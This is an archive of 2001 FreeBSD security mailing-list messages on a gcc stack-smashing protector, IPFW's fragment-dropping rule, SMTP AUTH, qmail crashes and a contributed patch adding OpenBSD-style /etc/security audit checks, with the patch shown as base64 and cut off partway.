From owner-freebsd-security Sun May 20 18:12:03 2001
Delivered-To: freebsd-security@freebsd.org
Received: from virginia.yamato.ibm.co.jp (virginia.yamato.ibm.co.jp [203.141.89.165]) by hub.freebsd.org (Postfix) with ESMTP id 41D9C37B422 for ; Sun, 20 May 2001 18:12:00 -0700 (PDT) (envelope-from etoh@trl.ibm.co.jp)
Received: from ns.trl.ibm.com (ns.trl.ibm.com [9.116.48.18]) by virginia.yamato.ibm.co.jp (8.9.3/3.7W/GW3.3) with ESMTP id KAA14674; Mon, 21 May 2001 10:11:49 +0900
Received: from localhost by ns.trl.ibm.com (AIX4.3/8.9.3/TRL4.5SRV) id KAA24158; Mon, 21 May 2001 10:11:49 +0900
To: mixtim@home.com
Cc: security@FreeBSD.ORG
Subject: Re: Base system with gcc stack-smashing protector
In-Reply-To: <20010518211301.A53682@home.com>
References: <20010519093227T.etoh@trl.ibm.com> <20010518211301.A53682@home.com>
X-Mailer: Mew version 1.94b48 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20010521101149B.etoh@trl.ibm.com>
Date: Mon, 21 May 2001 10:11:49 +0900
From: Hiroaki Etoh
X-Dispatcher: imput version 990813(IM119)
Lines: 26
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At Fri, 18 May 2001 21:13:01 -0400, Mixtim wrote:
> Have you seen Phrack Magazine issue 56, article 5? The title is "Bypassing
> StackGuard and StackShield."
>
> "This article is an attempt to demonstrate that it is possible to
> exploit stack overflow vulnerabilities on systems secured by
> StackGuard or StackShield even in hostile environments (such as when
> the stack is non-executable)."
>
> Does your patch address their concerns?

Yes. The article pointed out that StackGuard or StackShield protection can be bypassed using buffer overflows to alter other pointers in the program besides the return address.
(StackGuard introduced a remediation, which is called XOR canary protection, with a little performance overhead.) My protection changes the locations of such pointers to the location behind buffers, so those pointers cannot be altered using buffer overflows. It achieves the protection without performance degradation. Please see http://www.trl.ibm.com/projects/security/ssp/node4.html#SECTION00042000000000000000 in detail.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 21 04:45:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sivka.carrier.kiev.ua (sivka.carrier.kiev.ua [193.193.193.101]) by hub.freebsd.org (Postfix) with ESMTP id 82F1637B42C for ; Mon, 21 May 2001 04:45:21 -0700 (PDT) (envelope-from diman@asd-g.com)
Received: from core.is.kiev.ua (p187.is.kiev.ua [62.244.5.187] (may be forged)) by sivka.carrier.kiev.ua (8/Kilkenny_is_better) with ESMTP id ORK05445; Mon, 21 May 2001 14:45:12 +0300 (EEST) (envelope-from diman@asd-g.com)
Received: from [10.203.1.10] ([10.203.1.10]) by core.is.kiev.ua (8.11.1/ASDG-2.3-NR) with ESMTP id f4LBjBM64945; Mon, 21 May 2001 14:45:11 +0300 (EEST) (envelope-from diman@asd-g.com)
Date: Mon, 21 May 2001 12:41:52 +0000 (GMT)
From: diman
X-Sender: diman@portal.none.ua
To: Lowell Gilbert
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW Rule -1 Always = Attack?
In-Reply-To: <44y9rtf9ox.fsf@lowellg.ne.mediaone.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On 19 May 2001, Lowell Gilbert wrote:

> dwplists@loop.com (D. W.
Piper) writes:
>
> > If I understand things correctly from the archives and the IPFW man
> > page, IPFW rule -1 is built into the firewall, and only applies to
> > rejecting IP fragments with a fragment offset of one. The man page
> > further states, "This is a valid packet, but it only has one use, to try
> > to circumvent firewalls."
> >
> > Does that mean that every packet dropped by rule -1 indicates a
> > deliberate attempt to circumvent the firewall, and should be reported to
> > the appropriate network administrator for the source IP address?
>
> It's *possible* that the rule could be triggered by something that
> wasn't an attack. Thinking about it briefly, it seems slightly more
> likely that it's part of a probe, rather than an actual attack
> However, reporting to the network administrator for that address is
> almost certainly useless in any case, because an attacker would
> probably have spoofed that address anyway. [An attacker wouldn't ever
> get any response from that packet in any case.]

An attacker can get an answer from a destination host. It's an ipfw between if he won't.
Easy rule :)

From owner-freebsd-security Mon May 21 06:11:01 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155]) by hub.freebsd.org (Postfix) with ESMTP id 769FD37B422 for ; Mon, 21 May 2001 06:10:58 -0700 (PDT) (envelope-from slack@suntop-cn.com)
Received: from slack ([61.140.48.224]) (authenticated) by www.suntop-cn.com (8.11.3/8.11.3) with ESMTP id f4LDAHD71180; Mon, 21 May 2001 21:10:21 +0800 (CST) (envelope-from slack@suntop-cn.com)
Message-ID: <002401c0e1f7$66d3c460$9201a8c0@home.net>
From: "edwin chan"
To: "Hajimu UMEMOTO"
Cc:
References: <002c01c0dfa8$c6ae8600$9201a8c0@home.net> <20010519.001015.48821893.ume@mahoroba.org>
Subject: Re: AUTH and sendmail
Date: Mon, 21 May 2001 21:10:14 +0800
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200

Hi, Hajimu UMEMOTO,

Thanks, your answer is very useful to me. I read some articles about DRAC / POP before SMTP and SMTP AUTH. One thing is very clarified: sendmail uses SMTP AUTH as its "office function".
I should try it soon.

edwin chan

From owner-freebsd-security Mon May 21 07:41:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from be-well.ilk.org (lowellg.ne.mediaone.net [24.147.184.128]) by hub.freebsd.org (Postfix) with ESMTP id DD6AD37B422 for ; Mon, 21 May 2001 07:41:09 -0700 (PDT) (envelope-from lowell@be-well.ilk.org)
Received: (from lowell@localhost) by be-well.ilk.org (8.11.3/8.11.3) id f4LEf8Z04609; Mon, 21 May 2001 10:41:08 -0400 (EDT) (envelope-from lowell)
To: freebsd-security@freebsd.org
Subject: Re: IPFW Rule -1 Always = Attack?
References: <44y9rtf9ox.fsf@lowellg.ne.mediaone.net>
From: Lowell Gilbert
Date: 21 May 2001 10:41:07 -0400
In-Reply-To: diman@asd-g.com's message of "21 May 2001 13:45:44 +0200"
Message-ID: <44ae4669z0.fsf@lowellg.ne.mediaone.net>
Lines: 39
X-Mailer: Gnus v5.7/Emacs 20.7

diman@asd-g.com (diman) writes:

> On 19 May 2001, Lowell Gilbert wrote:
>
> > dwplists@loop.com (D. W. Piper) writes:
> >
> > > If I understand things correctly from the archives and the IPFW man
> > > page, IPFW rule -1 is built into the firewall, and only applies to
> > > rejecting IP fragments with a fragment offset of one. The man page
> > > further states, "This is a valid packet, but it only has one use, to try
> > > to circumvent firewalls."
> > >
> > > Does that mean that every packet dropped by rule -1 indicates a
> > > deliberate attempt to circumvent the firewall, and should be reported to
> > > the appropriate network administrator for the source IP address?
> >
> > It's *possible* that the rule could be triggered by something that
> > wasn't an attack.
> > Thinking about it briefly, it seems slightly more
> > likely that it's part of a probe, rather than an actual attack
> > However, reporting to the network administrator for that address is
> > almost certainly useless in any case, because an attacker would
> > probably have spoofed that address anyway. [An attacker wouldn't ever
> > get any response from that packet in any case.]
>
> An attacker can get an answer from a destination host. It's an ipfw between
> if he won't. Easy rule :)

This is incorrect. The attacker can't get an answer in either case. The destination host won't reply unless the packet with the fragment offset of zero *also* got through to that destination host, in which case this rule doesn't matter. If it isn't the case, the destination host will never get a whole packet, and will never respond.

The "rule -1" situation is only useful (to attackers) as part of a traffic analysis scheme, and not terribly even for that. However, there's no downside to dropping these packets, so we do.
- Lowell

From owner-freebsd-security Mon May 21 12:28:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id 8D17E37B424 for ; Mon, 21 May 2001 12:28:20 -0700 (PDT) (envelope-from subscribed@de-net.org)
Received: (qmail 39553 invoked by uid 504); 21 May 2001 12:24:05 -0000
Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 21 May 2001 12:24:05 -0000
From: "Dan Graaff"
To:
Subject: Qmail + FreeBSD 4.3
Date: Mon, 21 May 2001 12:27:34 -0700
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
In-Reply-To: <44ae4669z0.fsf@lowellg.ne.mediaone.net>

Hello all..

After the recent hacking of my affiliate, I'm starting to get worried about my own qmail boxes.
One of them has had no errors for a month, now I'm starting to get these in my root mailers:

xxxxxxx.xxxxxxxxxxx.xxx kernel log messages:
> ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
> pid 28411 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 28548 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 28923 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 29902 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 30470 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 30874 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 32198 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 32552 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 32923 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 33584 (qmailadmin), uid 89: exited on signal 11
> pid 34603 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 34624 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 34662 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 34898 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 34910 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 34935 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 35228 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 35286 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 35297 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 35651 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 35693 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 35772 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 36172 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 36204 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 36312 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 36608 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> pid 36631 (vdelivermail), uid 89: exited on signal 11 (core dumped)

Any thoughts? Help?

-Dan Graaff / Digital

From owner-freebsd-security Mon May 21 13:53:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id EC74A37B422 for ; Mon, 21 May 2001 13:52:53 -0700 (PDT) (envelope-from rik@pkl.net)
Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id VAA17974 for ; Mon, 21 May 2001 21:52:43 +0100
Date: Mon, 21 May 2001 21:52:43 +0100 (BST)
From: Rik
To: freebsd-security@freebsd.org
Subject: A few more tests to add to /etc/security
Message-ID:
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1876168249-1983639606-990478082=:17879"
Content-ID:

--1876168249-1983639606-990478082=:17879
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID:

Hi,

I have been using OpenBSD for a while, and I am about to try FreeBSD, and while browsing /etc, I noticed that the /etc/security script is slightly sparse, so I took the liberty of adding a few tests from the OpenBSD /etc/security script. I have *NOT* checked that they work, yet, although a lot of the tests should work straight off. Pay particular attention to the master.passwd checks, since I haven't a clue if there's a different format between OpenBSD and FreeBSD...

Anyway, hope these help, have fun, etc...
rik --1876168249-1983639606-990478082=:17879 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME=patch-more-security Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Some more /etc/security tests Content-Disposition: ATTACHMENT; FILENAME=patch-more-security VGhpcyBwYXRjaCBhZGRzIGluIGEgYnVuY2ggb2YgY2hlY2tzIHRoYXQgT3Bl bkJTRCAyLjkgKGFzIG9mIDIxL01heS8yMDAxLA0KcHJlcmVsZWFzZSkgZG9l cy4NCg0KSXQgKkhBUyBOT1QqIGJlZW4gY2hlY2tlZC4gSSBkb24ndCBldmVu IHJ1biBGcmVlQlNEICh5ZXQpLiBZb3UgYXJlIHdlbGNvbWUgdG8NCmhhY2sg dGhpcyBhcm91bmQuIFBsZWFzZSBjaGVjayBhbGwgb2YgdGhlIG5ldyBjaGVj a3MsIHNpbmNlIEkgaGF2ZW4ndC4gVGhleQ0KYXJlIGFsbCB3b3J0aCBkb2lu Zywgc28gcGxlYXNlIGRvIGluY2x1ZGUgdGhlbS4NCg0KRW5qb3ksDQoNCnJp aw0KDQotLS0gZmJzZC1zZWN1cml0eQlNb24gTWF5IDIxIDE5OjMxOjE5IDIw MDENCisrKyBzZWN1cml0eQlNb24gTWF5IDIxIDIwOjA0OjA4IDIwMDENCkBA IC02MSw3ICs2MSw0MDMgQEANCiBob3N0PWBob3N0bmFtZWANCiBbICRzZmxh ZyA9IEZBTFNFIF0gJiYgZWNobyAiU3ViamVjdDogJHtob3N0fSBzZWN1cml0 eSBjaGVjayBvdXRwdXQiDQogDQotdW1hc2sgMDI3DQordW1hc2sgMDc3DQor DQorTVA9L2V0Yy9tYXN0ZXIucGFzc3dkDQorYXdrIC1GOiAnew0KKyAgICBp ZiAoJDAgfiAvXlsgICAgIF0qJC8pIHsNCisgICAgICAgIHByaW50ZigiTGlu ZSAlZCBpcyBhIGJsYW5rIGxpbmUuXG4iLCBOUik7DQorICAgICAgICBuZXh0 Ow0KKyAgICB9DQorICAgIGlmIChORiAhPSAxMCkNCisgICAgICAgIHByaW50 ZigiTGluZSAlZCBoYXMgdGhlIHdyb25nIG51bWJlciBvZiBmaWVsZHM6XG4l c1xuIiwgTlIsICQwKTsNCisgICAgaWYgKCQxIH4gL15bKy1dLykNCisgICAg ICAgIG5leHQ7DQorICAgIGlmICgkMSA9PSAiIikNCisgICAgICAgIHByaW50 ZigiTGluZSAlZCBoYXMgYW4gZW1wdHkgbG9naW4gZmllbGQ6XG4lc1xuIiwg TlIsICQwKTsNCisgICAgZWxzZSBpZiAoJDEgIX4gL15bQS1aYS16MC05XVtB LVphLXowLTlfLV0qJC8pDQorICAgICAgICBwcmludGYoIkxvZ2luICVzIGhh cyBub24tYWxwaGFudW1lcmljIGNoYXJhY3RlcnMuXG4iLCAkMSk7DQorICAg IGlmIChsZW5ndGgoJDEpID4gMzEpDQorICAgICAgICBwcmludGYoIkxvZ2lu ICVzIGhhcyBtb3JlIHRoYW4gMzEgY2hhcmFjdGVycy5cbiIsICQxKTsNCisg ICAgaWYgKCQyID09ICIiKQ0KKyAgICAgICAgcHJpbnRmKCJMb2dpbiAlcyBo YXMgbm8gcGFzc3dvcmQuXG4iLCAkMSk7DQorICAgIGlmICgkMiAhPSAiIiAm JiBsZW5ndGgoJDIpICE9IDEzICYmICgkMTAgfiAvLipzaCQvIHx8ICQxMCA9 
PSAiIikgJiYNCisgICAgICAgICAgICgkMiAhfiAvXlwkWzAtOWEtZl0rXCQv KSAmJiAoJDIgIT0gInNrZXkiKSkgew0KKyAgICAgICAgaWYgKHN5c3RlbSgi dGVzdCAtcyAvZXRjL3NrZXlrZXlzICYmIGdyZXAgLXEgXCJeIiQxIiBcIg0K Ky9ldGMvc2tleWtleXMiKSA9PSAwKQ0KKyAgICAgICAgICAgIHByaW50Zigi TG9naW4gJXMgaXMgb2ZmIGJ1dCBzdGlsbCBoYXMgYSB2YWxpZCBzaGVsbCBh bmQgYW4gZW50cnkNCitpbiAvZXRjL3NrZXlrZXlzLlxuIiwgJDEpOw0KKyAg ICAgICAgaWYgKHN5c3RlbSgidGVzdCAtZCAiJDkiIC1hICEgLXIgIiQ5IiIp ID09IDApDQorICAgICAgICAgICAgcHJpbnRmKCJMb2dpbiAlcyBpcyBvZmYg YnV0IHN0aWxsIGhhcyB2YWxpZCBzaGVsbCBhbmQgaG9tZQ0KK2RpcmVjdG9y eSBpcyB1bnJlYWRhYmxlXG5cdCBieSByb290OyBjYW5ub3QgY2hlY2sgZm9y IGV4aXN0ZW5jZSBvZiBhbHRlcm5hdGUNCithY2Nlc3MgZmlsZXMuXG4iLCAk MSk7DQorICAgICAgICBlbHNlIGlmIChzeXN0ZW0oImZvciBmaWxlIGluIC5z c2ggLnJob3N0cyAuc2hvc3RzIC5rbG9naW47IGRvIGlmIHRlc3QNCistZSAi JDkiLyRmaWxlOyB0aGVuIGlmICgobHMgLWxkICIkOSIvJGZpbGUgfCBjdXQg LWIgMi0xMCB8IGdyZXAgLXEgcikgJiYgKHRlc3QNCishIC1PICIkOSIvJGZp bGUpKSA7IHRoZW4gZXhpdCAxOyBmaTsgZmk7IGRvbmUiKSkNCisgICAgICAg ICAgICAgcHJpbnRmKCJMb2dpbiAlcyBpcyBvZmYgYnV0IHN0aWxsIGhhcyBh IHZhbGlkIHNoZWxsIGFuZCBhbHRlcm5hdGUNCithY2Nlc3MgZmlsZXMgaW5c blx0IGhvbWUgZGlyZWN0b3J5IGFyZSBzdGlsbCByZWFkYWJsZS5cbiIsJDEp Ow0KKyAgICB9DQorICAgIGlmICgkMyA9PSAwICYmICQxICE9ICJyb290IikN CisgICAgICAgIHByaW50ZigiTG9naW4gJXMgaGFzIGEgdXNlciBJRCBvZiAw LlxuIiwgJDEpOw0KKyAgICBpZiAoJDMgPCAwKQ0KKyAgICAgICAgcHJpbnRm KCJMb2dpbiAlcyBoYXMgYSBuZWdhdGl2ZSB1c2VyIElELlxuIiwgJDEpOw0K KyAgICBpZiAoJDQgPCAwKQ0KKyAgICAgICAgcHJpbnRmKCJMb2dpbiAlcyBo YXMgYSBuZWdhdGl2ZSBncm91cCBJRC5cbiIsICQxKTsNCit9JyA8ICRNUCA+ ICRPVVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7IHRoZW4NCisgICAgZWNo byAiXG5DaGVja2luZyB0aGUgJHtNUH0gZmlsZToiDQorICAgIGNhdCAkT1VU UFVUDQorZmkNCisNCithd2sgLUY6ICd7IHByaW50ICQxIH0nICRNUCB8IHNv cnQgfCB1bmlxIC1kID4gJE9VVFBVVA0KK2lmIFsgLXMgJE9VVFBVVCBdIDsg dGhlbg0KKyAgICBlY2hvICJcbiR7TVB9IGhhcyBkdXBsaWNhdGUgdXNlciBu YW1lcy4iDQorICAgIGNvbHVtbiAkT1VUUFVUDQorZmkNCisNCithd2sgLUY6 ICcvXlteXCtdLyB7IHByaW50ICQxICIgIiAkMyB9JyAkTVAgfCBzb3J0IC1u 
ICsxIHwgdGVlICRUTVAxIHwNCit1bmlxIC1kIC1mIDEgfCBhd2sgJ3sgcHJp bnQgJDIgfScgPiAkVE1QMg0KK2lmIFsgLXMgJFRNUDIgXSA7IHRoZW4NCisg ICAgZWNobyAiXG4ke01QfSBoYXMgZHVwbGljYXRlIHVzZXIgSUQncy4iDQor ICAgICAgICB3aGlsZSByZWFkIHVpZDsgZG8NCisgICAgICAgICAgICAgICAg Z3JlcCAtdyAkdWlkICRUTVAxDQorICAgICAgICBkb25lIDwgJFRNUDIgfCBj b2x1bW4NCitmaQ0KKw0KKyMgQ2hlY2sgdGhlIGdyb3VwIGZpbGUgc3ludGF4 Lg0KK0dSUD0vZXRjL2dyb3VwDQorYXdrIC1GOiAnew0KKyAgICBpZiAoJDAg fiAvXlsgICAgIF0qJC8pIHsNCisgICAgICAgIHByaW50ZigiTGluZSAlZCBp cyBhIGJsYW5rIGxpbmUuXG4iLCBOUik7DQorICAgICAgICBuZXh0Ow0KKyAg ICB9DQorICAgIGlmICgkMSB+IC9eWystXS4qJC8pDQorICAgICAgICBuZXh0 Ow0KKyAgICBpZiAoTkYgIT0gNCkNCisgICAgICAgIHByaW50ZigiTGluZSAl ZCBoYXMgdGhlIHdyb25nIG51bWJlciBvZiBmaWVsZHM6XG4lc1xuIiwgTlIs ICQwKTsNCisgICAgaWYgKCQxICF+IC9eW0EtemEtejAtOV1bQS16YS16MC05 Xy1dKiQvKQ0KKyAgICAgICAgcHJpbnRmKCJHcm91cCAlcyBoYXMgbm9uLWFs cGhhbnVtZXJpYyBjaGFyYWN0ZXJzLlxuIiwgJDEpOw0KKyAgICBpZiAobGVu Z3RoKCQxKSA+IDMxKQ0KKyAgICAgICAgcHJpbnRmKCJHcm91cCAlcyBoYXMg bW9yZSB0aGFuIDMxIGNoYXJhY3RlcnMuXG4iLCAkMSk7DQorICAgIGlmICgk MyAhfiAvWzAtOV0qLykNCisgICAgICAgIHByaW50ZigiTG9naW4gJXMgaGFz IGEgbmVnYXRpdmUgZ3JvdXAgSUQuXG4iLCAkMSk7DQorfScgPCAkR1JQID4g JE9VVFBVVA0KK2lmIFsgLXMgJE9VVFBVVCBdIDsgdGhlbg0KKyAgICBlY2hv ICJcbkNoZWNraW5nIHRoZSAke0dSUH0gZmlsZToiDQorICAgIGNhdCAkT1VU UFVUDQorZmkNCisNCithd2sgLUY6ICd7IHByaW50ICQxIH0nICRHUlAgfCBz b3J0IHwgdW5pcSAtZCA+ICRPVVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7 IHRoZW4NCisgICAgZWNobyAiXG4ke0dSUH0gaGFzIGR1cGxpY2F0ZSBncm91 cCBuYW1lcy4iDQorICAgIGNvbHVtbiAkT1VUUFVUDQorZmkNCisNCitlY2hv ICJDaGVja2luZyByb290IGNzaCBwYXRocywgYW5kIHVtYXNrIHZhbHVlczpc biR7bGlzdH0iDQorcmhvbWU9L3Jvb3QNCit1bWFza3NldD1ubw0KK2xpc3Q9 Ii9ldGMvY3NoLmNzaHJjIC9ldGMvY3NoLmxvZ2luICR7cmhvbWV9Ly5jc2hy YyAke3Job21lfS8ubG9naW4iDQorZm9yIGkgaW4gJGxpc3QgOyBkbw0KKwlp ZiBbIC1zICRpIF0gOyB0aGVuDQorCQlpZiBlZ3JlcCB1bWFzayAkaSA+IC9k ZXYvbnVsbCA7IHRoZW4NCisJCQl1bWFza3NldD15ZXMNCisJCWZpDQorCQll Z3JlcCB1bWFzayAkaSB8DQorCQlhd2sgJyQyICUgMTAwIDwgMjAgXA0KKwkJ 
CXsgcHJpbnQgIlJvb3QgdW1hc2sgaXMgZ3JvdXAgd3JpdGVhYmxlIiB9DQor CQkJICQyICUgMTAgPCAyIFwNCisJCQl7IHByaW50ICJSb290IHVtYXNrIGlz IG90aGVyIHdyaXRlYWJsZSIgfScNCisJCVNBVkVfUEFUSD0kUEFUSA0KKwkJ dW5zZXQgUEFUSA0KKwkJL2Jpbi9jc2ggLWYgLXMgPDwgZW5kLW9mLWNzaCA+ IC9kZXYvbnVsbCAyPiYxDQorCQkJc291cmNlICRpDQorCQkJaWYgKFwkP3Bh dGgpIHRoZW4NCisJCQkJL2Jpbi9scyAtbGRnVCBcJHBhdGggPiAkVE1QDQor CQkJZWxzZQ0KKwkJCQljYXQgL2Rldi9udWxsID4gJFRNUA0KKwkJCWVuZGlm DQorZW5kLW9mLWNzaA0KKwkJUEFUSD0kU0FWRV9QQVRIDQorCQlhd2sgJ3sN CisJCQlpZiAoJDEwIH4gL15cLiQvKSB7DQorCQkJCXByaW50ICJUaGUgcm9v dCBwYXRoIGluY2x1ZGVzIC4iOw0KKwkJCQluZXh0Ow0KKwkJCX0NCisJCQkg fQ0KKwkJCSQxIH4gL15kLi4uLncvIFwNCisJCXsgcHJpbnQgIlJvb3QgcGF0 aCBkaXJlY3RvcnkgIiAkMTAgIiBpcyBncm91cCB3cml0ZWFibGUuIiB9IFwN CisJCQkkMSB+IC9eZC4uLi4uLi53LyBcDQorCQl7IHByaW50ICRSb290IHBh dGggZGlyZWN0b3J5ICIgJDEwICIgaXMgb3RoZXIgd3JpdGVhYmxlLiIgfScg XA0KKwkJPCAkVE1QDQorCWlmDQorZG9uZQ0KK2lmIFsgJHVtYXNrc2V0ID0g Im5vIiBdIDsgdGhlbg0KKwllY2hvICJcblJvb3QgY3NoIHN0YXJ0dXAgZmls ZXMgZG8gbm90IHNldCB0aGUgdW1hc2suIg0KK2ZpDQorDQorZWNobyAiQ2hl Y2tpbmcgcm9vdCBzaCBwYXRocywgdW1hc2sgdmFsdWVzOlxueyRsaXN0fSIN CityaG9tZT0vcm9vdA0KK3VtYXNrc2V0PW5vDQorbGlzdD0iL2V0Yy9wcm9m aWxlICR7cmhvbWV9Ly5wcm9maWxlIg0KK2ZvciBpIGluICRsaXN0OyBkbw0K KyAgICBpZiBbIC1zICRpIF0gOyB0aGVuDQorICAgICAgICBpZiBlZ3JlcCB1 bWFzayAkaSA+IC9kZXYvbnVsbCA7IHRoZW4NCisgICAgICAgICAgICB1bWFz a3NldD15ZXMNCisgICAgICAgIGZpDQorICAgICAgICBlZ3JlcCB1bWFzayAk aSB8DQorICAgICAgICBhd2sgJyQyICUgMTAwIDwgMjAgXA0KKyAgICAgICAg ICAgIHsgcHJpbnQgIlJvb3QgdW1hc2sgaXMgZ3JvdXAgd3JpdGVhYmxlIiB9 IFwNCisgICAgICAgICAgICAgJDIgJSAxMCA8IDIgXA0KKyAgICAgICAgICAg IHsgcHJpbnQgIlJvb3QgdW1hc2sgaXMgb3RoZXIgd3JpdGVhYmxlIiB9JyA+ PiAkT1VUUFVUDQorICAgICAgICBTQVZFX1BBVEg9JFBBVEgNCisgICAgICAg IFNBVkVfRU5WPSRFTlYNCisgICAgICAgIHVuc2V0IFBBVEggRU5WDQorICAg ICAgICAvYmluL3NoIDw8IGVuZC1vZi1zaCA+IC9kZXYvbnVsbCAyPiYxDQor ICAgICAgICAgICAgLiAkaQ0KKyAgICAgICAgICAgIGlmIFsgWCJcJFBBVEgi ICE9ICJYIiBdOyB0aGVuDQorICAgICAgICAgICAgICAgIGxpc3Q9XGBlY2hv 
IFwkUEFUSCB8IC91c3IvYmluL3NlZCAtZSAncy86LyAvZydcYA0KKyAgICAg ICAgICAgICAgICAvYmluL2xzIC1sZGdUIFwkbGlzdCA+ICRUTVAxDQorICAg ICAgICAgICAgZWxzZQ0KKyAgICAgICAgICAgICAgICA+ICRUTVAxDQorICAg ICAgICAgICAgZmkNCisgICAgICAgICAgICBlY2hvIFwkRU5WID4+ICRUTVAy DQorZW5kLW9mLXNoDQorICAgICAgICBQQVRIPSRTQVZFX1BBVEgNCisgICAg ICAgIEVOVj0kU0FWRV9FTlYNCisgICAgICAgIGF3ayAnew0KKyAgICAgICAg ICAgIGlmICgkMTAgfiAvXlwuJC8pIHsNCisgICAgICAgICAgICAgICAgcHJp bnQgIlRoZSByb290IHBhdGggaW5jbHVkZXMgLiI7DQorICAgICAgICAgICAg ICAgIG5leHQ7DQorICAgICAgICAgICAgfQ0KKyAgICAgICAgICAgICB9DQor ICAgICAgICAgICAgICQxIH4gL15kLi4uLncvIFwNCisgICAgICAgIHsgcHJp bnQgIlJvb3QgcGF0aCBkaXJlY3RvcnkgIiAkMTAgIiBpcyBncm91cCB3cml0 ZWFibGUuIiB9IFwNCisgICAgICAgICAgICAgJDEgfiAvXmQuLi4uLi4udy8g XA0KKyAgICAgICAgeyBwcmludCAiUm9vdCBwYXRoIGRpcmVjdG9yeSAiICQx MCAiIGlzIG90aGVyIHdyaXRlYWJsZS4iIH0nIFwNCisgICAgICAgIDwgJFRN UDEgPj4gJE9VVFBVVA0KKw0KKyAgICBmaQ0KK2RvbmUNCitpZiBbICR1bWFz a3NldCA9ICJubyIgXSA7IHRoZW4NCisgICAgZWNobyAiXG5Sb290IHNoIHN0 YXJ0dXAgZmlsZXMgZG8gbm90IHNldCB0aGUgdW1hc2suIg0KK2ZpDQorDQor ZWNobyAiQ2hlY2tpbmcgcm9vdCBrc2ggcGF0aHMsIHVtYXNrIHZhbHVlczpc bnskbGlzdH0iDQorIyBBIGdvb2QgLmtzaHJjIHdpbGwgbm90IGhhdmUgYSB1 bWFzayBvciBwYXRoLCB0aGF0IGJlaW5nIHNldCBpbiAucHJvZmlsZQ0KKyMg Y2hlY2sgYW55d2F5Lg0KKz4gJE9VVFBVVA0KK3Job21lPS9yb290DQorbGlz dD0iL2V0Yy9rc2gua3NocmMgYGNhdCAkVE1QMmAiDQorKGNkICRyaG9tZQ0K KyBmb3IgaSBpbiAkbGlzdDsgZG8NCisgICAgaWYgWyAtcyAkaSBdIDsgdGhl bg0KKyAgICAgICAgZWdyZXAgdW1hc2sgJGkgfA0KKyAgICAgICAgYXdrICck MiAlIDEwMCA8IDIwIFwNCisgICAgICAgICAgICB7IHByaW50ICJSb290IHVt YXNrIGlzIGdyb3VwIHdyaXRlYWJsZSIgfSBcDQorICAgICAgICAgICAgICQy ICUgMTAgPCAyIFwNCisgICAgICAgICAgICB7IHByaW50ICJSb290IHVtYXNr IGlzIG90aGVyIHdyaXRlYWJsZSIgfScgPj4gJE9VVFBVVA0KKyAgICAgICAg aWYgZWdyZXAgUEFUSD0gJGkgPiAvZGV2L251bGwgOyB0aGVuDQorICAgICAg 